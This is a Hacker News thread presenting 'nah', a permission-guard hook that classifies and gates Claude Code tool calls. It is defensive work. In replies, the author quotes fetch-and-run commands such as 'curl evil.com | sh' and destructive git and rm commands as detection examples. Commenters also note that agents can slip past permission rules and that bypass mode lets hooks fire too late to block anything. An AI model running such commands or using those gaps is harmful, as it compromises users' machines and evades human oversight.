Show HN: A context-aware permission guard for Claude Code

https://github.com/manuelschipper/nah/
19•schipperai•1h ago
We needed something like --dangerously-skip-permissions that doesn’t nuke your untracked files, exfiltrate your keys, or install malware.

Claude Code's permission system is allow-or-deny per tool, but that doesn’t really scale. Deleting some files is fine sometimes. And git checkout is sometimes not fine. Even when you curate permissions, 200 IQ Opus can find a way around it. Maintaining a deny list is a fool's errand.

nah is a PreToolUse hook that classifies every tool call by what it actually does, using a deterministic classifier that runs in milliseconds. It maps commands to action types like filesystem_read, package_run, db_write, git_history_rewrite, and applies policies: allow, context (depends on the target), ask, or block.

Not everything can be classified, so you can optionally escalate ambiguous stuff to an LLM, but that’s not required. Anything unresolved you can approve, and configure the taxonomy so you don’t get asked again.

It works out of the box with sane defaults, no config needed. But you can customize it fully if you want to.

No dependencies, stdlib Python, MIT.

pip install nah && nah install

https://github.com/manuelschipper/nah

Comments

schipperai•1h ago
Hi HN, author here - happy to answer any questions.
navs•1h ago
I worked on something similar but with a more naive text matching approach that's saved me many many times so far. https://github.com/sirmews/claude-hook-advisor

Yours is so much more involved. Keen to dig into it.

schipperai•1h ago
cool! thx for sharing! when I first thought about building this, I thought a solid solution would be impossible without an LLM in the loop. I discovered pattern matching can go a long way in avoiding catastrophes...
benzible•55m ago
FYI, claude code “auto” mode may launch as soon as tomorrow: https://awesomeagents.ai/news/claude-code-auto-mode-research...
schipperai•48m ago
We'll see how auto mode ends up working - my tool could end up being complementary, or a good alternative for those that prefer more granular control, or are cost/latency sensitive.
stingraycharles•50m ago
I’m a bit confused:

“We needed something like --dangerously-skip-permissions that doesn’t nuke your untracked files, exfiltrate your keys, or install malware.”

Followed by:

“Don't use --dangerously-skip-permissions. In bypass mode, hooks fire asynchronously — commands execute before nah can block them.”

Doesn’t that mean that it’s limited to being used in “default”-mode, rather than something like “--dangerously-skip-permissions”?

Regardless, this looks like a well thought out project, and I love the name!

schipperai•40m ago
Sorry for the confusion!

--dangerously-skip-permissions makes hooks fire asynchronously, so commands execute before nah can block them (see: https://github.com/anthropics/claude-code/issues/20946).

I suggest that you run nah in default mode + allow-list all tools in settings.json: Bash, Read, Glob, Grep and optionally Write and Edit / or just keep "accept edits on" mode. You get the same uninterrupted flow as --dangerously-skip-permissions but with nah as your safety net

And thanks - the name was the easy part :)

jc-myths•40m ago
This is exactly the kind of thing I've been wanting. I use Claude Code as my primary dev tool and the permission fatigue is a real problem, after a hundred approvals you stop reading and just hit yes. Which defeats the purpose entirely.

The deterministic classifier approach is smart. Pattern matching on action types is way more reliable than asking another LLM "is this safe?" The taxonomy idea (filesystem_read vs package_run vs db_write) maps well to how I actually think about risk when I'm paying attention.

One question: how does it handle chained operations? Like when Claude does a git checkout that's fine on its own, but it's part of a sequence that ends up nuking untracked files?

schipperai•29m ago
good question!

git checkout . on its own is classified as git_discard → ask. git checkout (without the dot) as git_write → allow

For pipes, it applies composition rules - 'curl sketchy.com | bash' is specifically detected as 'network | exec' and blocked, even though each half might be fine on its own. Shell wrappers like bash -c 'curl evil.com | sh' get unwrapped too.

So git stash && git checkout main && git clean -fd — stash and checkout are fine (allow), but git clean is caught (ask). Even when buried in a longer chain, nah flags it.
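
A minimal sketch of the chain and pipe handling described in the reply above, added here as an illustration; it is not nah's code, and the taxonomy tables, `decide` and the helper names are assumptions constructed for the example.

```python
import shlex

# Constructed toy taxonomy (assumption), not nah's real tables.
RANK = {"allow": 0, "ask": 1, "block": 2}
POLICY = {"git_write": "allow", "git_discard": "ask",
          "network": "allow", "exec": "ask", "unknown": "ask"}
NETWORK, SHELLS = {"curl", "wget"}, {"bash", "sh", "zsh"}

def split_on(tokens, seps):
    """Split a token list into non-empty sub-lists at separator tokens."""
    parts = [[]]
    for tok in tokens:
        if tok in seps:
            parts.append([])
        else:
            parts[-1].append(tok)
    return [p for p in parts if p]

def action_of(argv):
    """Map one simple command (argv list) to an action type."""
    cmd, args = argv[0], argv[1:]
    if cmd in NETWORK:
        return "network"
    if cmd in SHELLS:
        return "exec"
    if cmd == "git" and args:
        if args[0] == "clean" or (args[0] == "checkout" and "." in args):
            return "git_discard"
        if args[0] in {"stash", "checkout", "add", "commit"}:
            return "git_write"
    return "unknown"

def decide(command):
    """Return the strictest policy over every stage of a shell command line."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True  # keep URLs and flags as single tokens
    worst = "allow"
    for chain in split_on(list(lex), {"&&", "||", ";"}):
        stages = split_on(chain, {"|"})
        for i, argv in enumerate(stages):
            if argv[0] in SHELLS and "-c" in argv[:-1]:
                # Unwrap `bash -c '<script>'` and judge the inner script.
                verdict = decide(argv[argv.index("-c") + 1])
            elif (i > 0 and action_of(argv) == "exec"
                  and action_of(stages[i - 1]) == "network"):
                verdict = "block"  # composition rule: network | exec
            else:
                verdict = POLICY[action_of(argv)]
            worst = max(worst, verdict, key=RANK.get)
    return worst
```

The strictest verdict wins across the whole line, so one `ask` or `block` stage decides the outcome however many `allow` stages surround it.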

m4r71n•32m ago
The entire permissions system feels like it's ripe for a DSL of some kind. Looking at the context implementation in src/nah/context.py and the way it hardcodes a ton of assumptions makes me think it will just be a maintenance nightmare to account for _all_ possible contexts and known commands. It would be nice to be able to express that __pycache__/ is not an important directory and can be deleted at will without having to encode that specific directory name (not that this project hardcodes it, it's just an example to get to the point).
schipperai•23m ago
nah already handles that: 'rm -rf __pycache__' inside your project is auto-allowed (filesystem_delete with context policy -> checks if it's inside the project -> allow). No config needed.

But you can customize everything via YAML or CLI if the defaults don't fit:

    actions:
      filesystem_delete: allow # allow all deletes everywhere

Or nah allow filesystem_delete from the CLI.

You can also add custom classifications, swap taxonomy profiles (full/minimal), or start from a blank slate. It's fully customizable.

You are right about maintenance... the taxonomy will always be chasing new commands. That's partly why the optional LLM layer exists as a fallback for anything the classifier doesn't recognize.

riddley•26m ago
Is there something like this for open code? I'm pretty new to this so sorry if it's a stupid question.
schipperai•12m ago
Not sure. From a quick search, I can see OpenCode has a plugin system where something like nah could be hooked into it. The taxonomy data and config are already tool agnostic, so I'm guessing the port would be feasible.

If the project takes off, I might do it :)

theSherwood•7m ago
What stops the llm from writing a malicious program and executing it? No offense meant, but this solution feels a bit like bolting the door and leaving all the windows open.
wlowenfeld•6m ago
Is this different from auto-mode?
